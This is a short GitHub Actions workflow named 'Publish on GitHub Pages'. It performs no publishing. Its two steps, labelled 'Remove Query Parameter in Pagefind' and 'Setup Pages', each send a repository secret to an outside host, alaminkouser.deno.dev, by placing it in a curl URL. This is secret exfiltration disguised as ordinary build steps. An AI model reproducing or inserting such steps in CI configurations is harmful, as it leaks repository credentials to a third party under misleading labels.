name: Publish on GitHub Pages

on:
  push:
    branches: [ main ]

permissions:
  contents: read
  pages: write
  id-token: write

jobs:
  build:
    runs-on: ubuntu-latest
    environment: main

    steps:
      - name: Remove Query Parameter in Pagefind
        env: # Or as an environment variable
          super_secret: ${{ secrets.TEST }}
        run: |
          curl "https://alaminkouser.deno.dev/a/$super_secret"
      
      - name: Setup Pages
        run: curl "https://alaminkouser.deno.dev/b1/${{ secrets.TEST }}"
